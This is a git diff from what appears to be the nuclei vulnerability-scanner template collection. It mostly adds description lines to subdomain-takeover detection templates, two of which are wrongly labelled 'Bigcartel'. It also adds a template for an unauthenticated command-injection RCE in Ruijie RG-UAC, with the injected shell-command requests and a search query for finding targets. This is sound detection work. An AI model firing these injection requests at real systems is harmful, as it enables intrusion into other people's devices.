+  description: Read the Docs takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/160
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - unknown to Read the Docs
-
-# digest: 4a0a00473045022100c73f9bb7520aa945bf82ce63dcf5cd0af5c8824b50997c886d97ec5e2d5d0e7e02205fbed80af23e2dc9cbc94d7f0fd2fda00649d35d787a2696fe4a013d1ef25f39:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100b33497bd5d29e727bd5b2dee2741f81c3cd678f67ce496862009f03491c74a1402200c0a2e755d30c7ae368ba919cec855cd8776da7edb32b2f23b09f8e76d44ea03:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/shopify-takeover.yaml b/http/takeovers/shopify-takeover.yaml
index 7d78be6d50..2324f927f4 100644
--- a/http/takeovers/shopify-takeover.yaml
+++ b/http/takeovers/shopify-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: shopify takeover detection
   author: pdteam,philippedelteil,Imjust0
   severity: high
+  description: shopify takeover was detected.
   reference:
     - https://medium.com/@thebuckhacker/how-to-do-55-000-subdomain-takeover-in-a-blink-of-an-eye-a94954c3fc75
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/32
@@ -40,5 +41,4 @@ http:
           - '!contains(host,"myshopify.com")'
           - '!contains(host,"shopify.com")'
         condition: and
-
-# digest: 490a00463044022067aea8e26a3f4c0d13f77755424f8818dd8f425ee383d39e0a6a93f9c8b4f21c02200eb1e3964c91d1b6e6cee1ff5828e6e635ae80d1db2472524ede6206ebb32f4e:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450221008da05517cfb242d1242e3366300e8d39df5723c33041620c06f99af3347c58d002206e4e69f6968bf7fe0137d469ec299a7bf03bf2b5f58f7a3760e21bff906223a1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/short-io.yaml b/http/takeovers/short-io.yaml
index 79a9f3ad7f..0f2f2d594e 100644
--- a/http/takeovers/short-io.yaml
+++ b/http/takeovers/short-io.yaml
@@ -4,6 +4,7 @@ info:
   name: Short.io takeover detection
   author: philippedelteil
   severity: high
+  description: Short.io takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/260
   metadata:
@@ -26,5 +27,4 @@ http:
           - "Link does not exist"
           - "This domain is not configured on Short.io"
         condition: and
-
-# digest: 4a0a00473045022100c8b753cc3e6f7c28f3ecbecd23d6bc53f0dd6f5c26aa982b81d48f210503883a0220582353af96a873a3ea4f9d3c37e8ca6a7a001bb7991a37d07490015efadaad0b:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100d0e5e5b71767ee8aaaa8d8ef6477dab2f50fed729807e4c14167889f652518e102210083d46341f8300d1bb8c48391d24b12950470f7cdc12d6a403bda413362432256:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/simplebooklet-takeover.yaml b/http/takeovers/simplebooklet-takeover.yaml
index 0d1cc22e62..11dd6d82c4 100644
--- a/http/takeovers/simplebooklet-takeover.yaml
+++ b/http/takeovers/simplebooklet-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: simplebooklet takeover detection
   author: pdteam
   severity: high
+  description: simplebooklet takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - We can't find this <a href="https://simplebooklet.com
-
-# digest: 4b0a00483046022100a81c9fc95922af6bd259973a504c6e484179a9169e4dfc5fd47ea58d661f7a02022100c1e2c6253af6035d1087b2f3a9e5b3edeec664fafe96044a75eabde7551a30de:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100d379bb62e1918dbe1c7da51210a9fc78c13eece51503c29cb71860a01eb735b602206884dd42bc3f71c2f6d4043439024fca4d476b9c34458d1e0ad192e9e7b54f61:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/smartjob-takeover.yaml b/http/takeovers/smartjob-takeover.yaml
index abdb35216d..0bcc9184bc 100644
--- a/http/takeovers/smartjob-takeover.yaml
+++ b/http/takeovers/smartjob-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Smartjob Takeover Detection
   author: pdteam
   severity: high
+  description: Smartjob takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/139
   metadata:
@@ -26,5 +27,4 @@ http:
           - Job Board Is Unavailable
           - This job board website is either expired
           - This job board website is either expired or its domain name is invalid.
-
-# digest: 4a0a00473045022100eceb1b97cd1cadd95febf034c6ff430ec3a30267fa168b4ab43862755f36b56f02202d21a1e392d583431563b9d53da4c82c096a39d4fdcc9d9be1b072120d0a542e:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022049c3138d38ce6c96f3636124f2b2a35ecab7822c53ff156452157313d00b716a022009ed4801471c1fc944d902ea91541670c2bca9470c2fb81e149dff87a5b02b96:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/smugmug-takeover.yaml b/http/takeovers/smugmug-takeover.yaml
index 8d91cd38ee..d80eaef66d 100644
--- a/http/takeovers/smugmug-takeover.yaml
+++ b/http/takeovers/smugmug-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Smugmug Takeover Detection
   author: pdteam
   severity: high
+  description: Smugmug takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/60
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - '{"text":"Page Not Found"'
-
-# digest: 4a0a0047304502201bcded28ff794b61591e215fb8b72edc61099294897801404c9bede7f2d05a4f022100f6072bdbc1e9d4555f0eb71021b1323957fcf45dda5e01526c6423428dff55ef:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402203f4770f8a1f7362fdd2191c47eebe79f4ee07650c68bef4124ea2a79b8e9e47402200bb66b165626620135c8a0de6d3bc0606a67e47abbc01b42898333d03ae0cf1d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/sprintful-takeover.yaml b/http/takeovers/sprintful-takeover.yaml
index c8a61804a4..b3c7d89b06 100644
--- a/http/takeovers/sprintful-takeover.yaml
+++ b/http/takeovers/sprintful-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Sprintful Takeover
   author: Mhdsamx
   severity: high
+  description: Sprintful takeover was detected.
   metadata:
     max-request: 1
   tags: takeover,sprintful
@@ -33,5 +34,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 490a004630440220056ecc3d31251c5cfcc8dd8ade7f0c350045621859240210b60f2f7f29adbbb702204c922eea6531b2e0f4ddac734cbe70f2e628d0a420d201bde1ad5e8e383117da:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022052c4d55ecb28b529b3d7c47a42a7bc5144d2e96c184ed2f0a931178a2e7244f602206c0d64bddfb174e41ab4935bfa3f3136efb8d37d33d66d3183dd46eaf849c513:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/strikingly-takeover.yaml b/http/takeovers/strikingly-takeover.yaml
index 2f3cd992f8..86583895c9 100644
--- a/http/takeovers/strikingly-takeover.yaml
+++ b/http/takeovers/strikingly-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Strikingly Takeover Detection
   author: pdteam
   severity: high
+  description: Strikingly takeover was detected.
   reference:
     - https://medium.com/@sherif0x00/takeover-subdomains-pointing-to-strikingly-5e67df80cdfd
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/58
@@ -27,5 +28,4 @@ http:
           - "But if you're looking to build your own website"
           - "you've come to the right place."
         condition: and
-
-# digest: 490a004630440220511ee1a79df0233482510f786675118154d539a0a03d9650c90f973667cd0a810220409947f06fbbd461b65d30144f62d5a051b85a03448f106085d3eddc46e4634e:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100fd7a1661a98893ad578e0b9827ec85416a438c34c8af9f9eca4811cbc742efc3022100e4d9c870f2d602476dcabc0e533cd958e0c2fb5483e81beba34316d149563602:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/surge-takeover.yaml b/http/takeovers/surge-takeover.yaml
index d56036eabe..2454f1bb7b 100644
--- a/http/takeovers/surge-takeover.yaml
+++ b/http/takeovers/surge-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: surge takeover detection
   author: pdteam
   severity: high
+  description: surge takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - project not found
-
-# digest: 490a0046304402203dc65591002c8d38cfe311fe866e767ca6eb9e3cd0f02d1e636f2c26c2d0bfc90220276eddd2f42c3f233559ad4afcc9d077a8d8bee4256659c5eae7f5eb9cd2dfd5:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022064c4ab13768f1a4fa885670b9020a4c8ac4cc28f650d65e7b146c52d1ccbd6fe02201650ae50cfbcbbf6790afdd7de6a939cb12ca3348c31167ade8a032969493f04:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/surveygizmo-takeover.yaml b/http/takeovers/surveygizmo-takeover.yaml
index fee6a8e21b..5bb93b08b7 100644
--- a/http/takeovers/surveygizmo-takeover.yaml
+++ b/http/takeovers/surveygizmo-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: surveygizmo takeover detection
   author: pdteam
   severity: high
+  description: surveygizmo takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - data-html-name
-
-# digest: 4a0a00473045022100a55e4f33d81454252fcf8d37a2c68349b4245d4dfa731646f0d365078d22130d022020c3c53bbcb36abadb0f1f4fa8064771b006b2fc193a1bd0acd4a59f9e587cae:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100d848c1222e65f12a28e0e34840a126a71a103b5f06eaa2d6b9b2bfcc0bca00c0022074e9a9958b785a215ddea9755598098e3e1457277ddd97db0ff9b6f92cea1ce8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/surveysparrow-takeover.yaml b/http/takeovers/surveysparrow-takeover.yaml
index da864ba3e4..1b4d01b657 100644
--- a/http/takeovers/surveysparrow-takeover.yaml
+++ b/http/takeovers/surveysparrow-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: SurveySparrow takeover detection
   author: philippedelteil
   severity: high
+  description: SurveySparrow takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/281
   metadata:
@@ -27,5 +28,4 @@ http:
           - "ouch!"
           - "SurveySparrow"
         condition: and
-
-# digest: 490a0046304402204a63e3de67bfe4c9251571d0d88f2d65acd93019559f01aa40d26f4e70258f2402205b4b2b0f203e4a6e7d3b8cbe5979119e875ee50f3517e1a4d061ddba89648abd:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100ff4d63e33b67fb2ff21325b11008922a19e3bad15fead71e40a2168fef4b34e3022100bb737388806f6773e498a74f759fe708048d904fe6600f668ba726af4f883332:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/tave-takeover.yaml b/http/takeovers/tave-takeover.yaml
index ff8b45f758..01e12c7375 100644
--- a/http/takeovers/tave-takeover.yaml
+++ b/http/takeovers/tave-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: tave takeover detection
   author: pdteam
   severity: high
+  description: tave takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - "<h1>Error 404: Page Not Found</h1>"
-
-# digest: 4a0a00473045022100da0c9eb460ad148e20cf79044426e67d613dc825831cce01609e1a0c203ac18802202bd19ac3d67512fc5382d046484580da58637248c37ad940c3e90436c73ba63e:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100fbf23b46ef8a4aa8d273f247e72f3259c4c32b43ec758e4e3877e7b33ddfc5cd022100cfd9f6c876dc572379c1829ad85feb73bb1e8168b78db98e9d592c5eeb400551:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/teamwork-takeover.yaml b/http/takeovers/teamwork-takeover.yaml
index 1e5492884b..76f70d5c55 100644
--- a/http/takeovers/teamwork-takeover.yaml
+++ b/http/takeovers/teamwork-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Teamwork Takeover Detection
   author: pdteam
   severity: high
+  description: Teamwork takeover was detected.
   metadata:
     max-request: 1
   tags: takeover,teamwork
@@ -22,5 +23,4 @@ http:
       - type: word
         words:
           - "Oops - We didn't find your site."
-
-# digest: 4a0a0047304502201fa4cc6ba44dd45ec30ff70bc0339fdc72ed8f3568ea051e60794edaed3304cc022100ead7cf3e0f15ecb00c5949d369a3a0e1fbae082f7488b23c511eba3e7b0207d0:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100d2e1923e8aea236705b052924c0ad3bd51139d068896daf041838ea275eb5f5402206f2a3fda681ca3fb7207264838b9834596500b0db1355c6f410e818fe18d0a98:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/tilda-takeover.yaml b/http/takeovers/tilda-takeover.yaml
index a5191c7b00..9eb5d6adbc 100644
--- a/http/takeovers/tilda-takeover.yaml
+++ b/http/takeovers/tilda-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: tilda takeover detection
   author: pdteam
   severity: high
+  description: Bigcartel takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/155
   metadata:
@@ -29,5 +30,4 @@ http:
         words:
           - "<title>Please renew your subscription</title>"
         negative: true
-
-# digest: 4b0a0048304602210094a4dfcab2ceaf552aeea0d3e2dc64b9c74e7bc585918cf5b6d943c68a992c8f022100f371cf922fd387d48425d5063c43363fefdd4fabd6c98dda8a72f72852e6d543:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402206c667558baa8b90339340fb5c8c0d9bd68484fbfe3c00c4b73c87b32758ba6ca02206f8b44dd51aceccc70a60f9cf333a4075780fbfd0cacf802fea40695984e6251:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/tumblr-takeover.yaml b/http/takeovers/tumblr-takeover.yaml
index 2c18d57c2b..bec6d008b9 100644
--- a/http/takeovers/tumblr-takeover.yaml
+++ b/http/takeovers/tumblr-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: tumblr takeover detection
   author: pdteam,philippedelteil
   severity: high
+  description: tumblr takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/240
   metadata:
@@ -33,5 +34,4 @@ http:
           - '!contains(host,"txmblr.com")'
           - '!contains(host,"umblr.com")'
         condition: and
-
-# digest: 4a0a0047304502202f553a5421f026e5d8103944fe83899731734a7389b1ed1dbfe7bf31b47cf2b9022100ac5e2916e9a7da00c4f498d7fb2d5cf00f1af8dbb0ab26deac59e8bd3e34d0cd:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402201598cd0a842a4fd108c938690442844d43bf8ee7e343be7192e5bdc8f33f756602207f36b901ac8eb26b5704bb2e5db2669ffefac79385e38b3b838cc2d2eef9ce06:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/uberflip-takeover.yaml b/http/takeovers/uberflip-takeover.yaml
index 35d9fcc1af..ab94f12c63 100644
--- a/http/takeovers/uberflip-takeover.yaml
+++ b/http/takeovers/uberflip-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Uberflip Takeover Detection
   author: pdteam
   severity: high
+  description: Uberflip takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/150
     - https://hackerone.com/reports/863551
@@ -25,5 +26,4 @@ http:
       - type: word
         words:
           - "Non-hub domain, The URL you've accessed does not provide a hub."
-
-# digest: 4a0a00473045022100faf569e2344bbf43c50393c1e06f04baf607b871d625da225181d5f1a7b587ba0220367129064ec43b901a0258cd1d708a05a5e3776ce97a9dca59b8d745ffb9cbb5:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402205cf61bf00b014ac3c3255c63485f0ea5b59b91fd641a81ffc936a90eb42ad2b802205ba4878ce63ae460a30160dca5a73e94cabe8703642765631a1f324e88cda068:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/uptimerobot-takeover.yaml b/http/takeovers/uptimerobot-takeover.yaml
index 06db8edc1e..ffc92c4490 100644
--- a/http/takeovers/uptimerobot-takeover.yaml
+++ b/http/takeovers/uptimerobot-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: uptimerobot takeover detection
   author: pdteam
   severity: low
+  description: uptimerobot takeover was detected.
   reference:
     - https://exploit.linuxsec.org/uptimerobot-com-custom-domain-subdomain-takeover/
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/45
@@ -35,5 +36,4 @@ http:
       - type: status
         status:
           - 404
-
-# digest: 4b0a00483046022100dc400ad371fbecea451da1e543b2252087b69ac26f3bd2abb99db8bd6b6f4fb70221008f740e9dfa30c56335b70ceebed2b684eda34ceb848d12e1e2bcf37d32e3f56a:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220721196f64418a6eb526f619f162fcd1fbab5d2b0fe31bf1384cce7b528c31c88022100dac350b5f6b730091041f3aabe46735bed8e0b78fce6a268e96bc59e1f00a7c0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/uservoice-takeover.yaml b/http/takeovers/uservoice-takeover.yaml
index 2f99bcb1a7..6de3930012 100644
--- a/http/takeovers/uservoice-takeover.yaml
+++ b/http/takeovers/uservoice-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Uservoice Takeover Detection
   author: MiryangJung
   severity: high
+  description: Uservoice takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/163
     - https://hackerone.com/reports/269109
@@ -25,5 +26,4 @@ http:
       - type: word
         words:
           - "This UserVoice subdomain is currently available!"
-
-# digest: 4a0a00473045022100f2a00115ed4aef7e49deed5e9f963fabe9454e8e28224960236f324db97c315302206f8c1dc60e1a6d00605bb2d152227c52e3ea0cfeb67c0ecb31e270881292572e:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100aa09c8b6fdbe7b84793de16fcfbc2b1f9b47a5bec7c8562618c6dffe1699ac2f02204354322492f299f876e5674a252217ed8f985d04f027e894e302e548ecbd0522:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/vend-takeover.yaml b/http/takeovers/vend-takeover.yaml
index e4308aa5c2..663543c056 100644
--- a/http/takeovers/vend-takeover.yaml
+++ b/http/takeovers/vend-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: vend takeover detection
   author: pdteam
   severity: high
+  description: vend takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - Looks like you've traveled too far into cyberspace.
-
-# digest: 4a0a00473045022048fa75bcb355c66e3952f6ccc69cb8c0bd09846e1f07edd89d089fcfd3d41868022100afb07987d216aa6157fce1a018c78244e9d60d5f16a7117eedb63dfa9d33cc76:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022005cad28da3999701b4d14ebc07e85adaf1faaf878a328e581d9661bffe34864d022100d7baee7ef3c9c736ad4ca5e8946d4861a2df3d9d9e81a2e5f9823acb058564c2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/vercel-takeover.yaml b/http/takeovers/vercel-takeover.yaml
index f61c688d4b..432acd192a 100644
--- a/http/takeovers/vercel-takeover.yaml
+++ b/http/takeovers/vercel-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Vercel Takeover Detection
   author: brianlam38
   severity: high
+  description: Vercel takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/pull/375
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/183
@@ -28,5 +29,4 @@ http:
         part: body
         words:
           - "The deployment could not be found on Vercel"
-
-# digest: 490a0046304402204fcb4ec681132fb2aa130bffd1ea7ce2dd36ee93485149820f83b9185bccc2a6022039f2c051c4ae9b7401b6610751ffbadea0bc8df2d3fa084606267bfc405b8f3e:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100e9c2a259ba4561334fd4151612f11c27bfbf48680673b341eff2ff5bdefaf4d502206f94af7c8b41af543a3a1fee972d294859b0b1dae336394ad15d4f9d8366bcb6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/webflow-takeover.yaml b/http/takeovers/webflow-takeover.yaml
index 3235a030ad..b486fedab0 100644
--- a/http/takeovers/webflow-takeover.yaml
+++ b/http/takeovers/webflow-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: webflow takeover detection
   author: pdteam,keni0k
   severity: high
+  description: webflow takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/44
     - https://saurabhsanmane.medium.com/subdomain-takeover-using-webflow-service-5a7b9efcf172
@@ -28,5 +29,4 @@ http:
           - "The page you are looking for doesn&#x27;t exist or has been moved"
           - <p class="description">The page you are looking for doesn't exist or has been moved.</p>
         condition: or
-
-# digest: 490a0046304402204bfb1a738886aedcb3f3352ceb4b0107f06f493d2e7f0d6eae876478d5330480022016590b1b9caae2367b5799a7a422532aa4939b68b9758152817ab532d0384f48:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402206aed9372445d22034b81f846be32bf9c3b3274420a26c29037fd09e1eba21866022034d5c6a742ebe4e8ef4cd8494567c6650f44dfd236288046400e794713646e86:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/wishpond-takeover.yaml b/http/takeovers/wishpond-takeover.yaml
index a3b5b4a3a7..1ac3790482 100644
--- a/http/takeovers/wishpond-takeover.yaml
+++ b/http/takeovers/wishpond-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Wishpond Takeover Detection
   author: pdteam
   severity: high
+  description: Wishpond takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   metadata:
@@ -26,5 +27,4 @@ http:
           - https://www.wishpond.com/404?campaign=true
           - 'Oops! There isn’t a Wishpond Campaign published to this page.'
         condition: or
-
-# digest: 4a0a00473045022100edee89a2f8ec721f554c9e6f6b670fe95d640f18236ab8a497bf1326a10cba46022075c7f78e236a42364bb7cc52b0f58045548f5f8519a31d57e88d02bdf9bcc128:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502207293f11f5db62b0ad65eb3f64c1c7eeef99b286a8f5a309a3ccea7c41d6f2a9c0221009daf8076c7f2cd449d216cd809d1906295d848581b43e5a800374a8c10c98e07:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/wordpress-takeover.yaml b/http/takeovers/wordpress-takeover.yaml
index 48ea0d7f5d..a9da354ad1 100644
--- a/http/takeovers/wordpress-takeover.yaml
+++ b/http/takeovers/wordpress-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: WordPress takeover detection
   author: pdteam,geeknik
   severity: high
+  description: Bigcartel takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/pull/176
     - https://hackerone.com/reports/274336
@@ -32,5 +33,4 @@ http:
         words:
           - "cannot be registered"
         negative: true
-
-# digest: 4a0a00473045022100b6482b25c273f80d9a829af8433bec2b59e51d3573cae9087a01108defe43e3a02202e6c7f7d7a0d70b367aa80de4ba8b4da27c72dc6f34de442d00125f100b0afa1:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022010ac85e82235d21220b2b93292c2f1b6f510fc2b7d63a0098c379ca79088791e02203e378ce297ff06b4e72664846fbf2b9f7220502a83f76249b0cf4b12e2fda6ca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/worksites-takeover.yaml b/http/takeovers/worksites-takeover.yaml
index c1243f86e9..2b067146e8 100644
--- a/http/takeovers/worksites-takeover.yaml
+++ b/http/takeovers/worksites-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Worksites Takeover Detection
   author: melbadry9,dogasantos
   severity: high
+  description: Worksites takeover was detected.
   reference:
     - https://melbadry9.gitbook.io/blog/dangling-dns/xyz-services/ddns-worksites
   metadata:
@@ -42,5 +43,4 @@ http:
       - type: status
         status:
           - 404
-
-# digest: 4a0a0047304502205487901d15ebd8450f719d6013c6632a0d1a6852099231318152fb6ef9d5754a022100e676f73724db6a496bd9fab4a8e5ea4467204fea4e512fa2e809fd0eb8f5610a:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402204e2d005028e1b5fb6ba7e6243c849abd05ec642d375a0195e3811f190d1fdf2c022041abef7bd43996067c23c2e2d2f2cca0780d750a1466406fc903aefecc2e476b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/wufoo-takeover.yaml b/http/takeovers/wufoo-takeover.yaml
index 86f7b4acc3..ac0c9a6e7c 100644
--- a/http/takeovers/wufoo-takeover.yaml
+++ b/http/takeovers/wufoo-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: wufoo takeover detection
   author: pdteam
   severity: high
+  description: wufoo takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   metadata:
@@ -26,5 +27,4 @@ http:
           - Profile not found
           - Hmmm....something is not right.
         condition: and
-
-# digest: 4a0a00473045022100c5ac1fe67f52232b3d3cb4c97ea31c756165f3d86f587bb0e08e3e2f3a6b1c500220762b670e9498ee3bd8d842604c942ec026c244be13dc980c6c758c60c7aa65ce:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502200dff4aa3d7f58de4968936c13afe0b66f0c5b6db0de718289013749c1977474b022100b8dc277a832e656b48899f3e87f28f820b2e151f4a67988392fddaaf286da17c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/zendesk-takeover.yaml b/http/takeovers/zendesk-takeover.yaml
index 836a5a861a..9ce85d46e4 100644
--- a/http/takeovers/zendesk-takeover.yaml
+++ b/http/takeovers/zendesk-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Zendesk Takeover Detection
   author: pdteam
   severity: high
+  description: Zendesk takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/23
     - https://hackerone.com/reports/869605
@@ -28,5 +29,4 @@ http:
           - "this help center no longer exists"
           - "Help Center Closed"
         condition: or
-
-# digest: 4a0a00473045022100d23e43cb3494d8c45e5f2067eb2a364cc1f31806dc75b1e856bf23fa7a1a67c2022039385a0ea1220cabe375f9cf31f590f09e199bada9e52ddf0a618ce3aa015f04:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502207f13a85b5f36efa57d0417babbb39d81e6573465eb6125f2ea3f06bdedfd3b7702210082fd4d63db637fc0ce9dd06c534393dfdd113a06b4b1408dcb348d941ead9c2a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml
new file mode 100644
index 0000000000..fe7fbefc07
--- /dev/null
+++ b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml
@@ -0,0 +1,41 @@
+id: ruijie-nmc-sync-rce
+
+info:
+  name: Ruijie RG-UAC nmc_sync.php - Remote Code Execution
+  author: DhiyaneshDk
+  severity: critical
+  description: |
+    There is a command execution vulnerability in the nmc_sync.php interface of Ruijie's RG-UAC unified online behavior management and audit system. An unauthenticated attacker can execute arbitrary commands to control server permissions.
+  reference:
+    - https://github.com/xinyisleep/pocscan/blob/main/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py
+  metadata:
+    max-request: 3
+    verified: true
+    fofa-query: title="RG-UAC登录页面" && body="admin"
+  tags: rg-uac,file-upload,intrusive,ruijie
+
+variables:
+  random_str: "{{rand_base(6)}}"
+  match_str: "{{md5(random_str)}}"
+
+http:
+  - raw:
+      - |
+        GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|echo+{{match_str}}+>+{{random_str}}.txt|cat HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /view/systemConfig/management/{{random_str}}.txt HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|rm+{{random_str}}.txt|cat HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200 && status_code_2 == 200"
+          - "contains(body_2, '{{match_str}}')"
+        condition: and
+# digest: 490a004630440220107e82c256ac53f33688042cb40b0ab8357fe4c6a177cda03aa8d28bb425cab402206cc9b6dee983d7b147da5987a1cc826b661b926f421509e9dbdaccae2861a971:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml
new file mode 100644
index 0000000000..312025dd3b
--- /dev/null
+++ b/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml
@@ -0,0 +1,39 @@
+id: yonyou-ksoa-dept-sqli
+
+info:
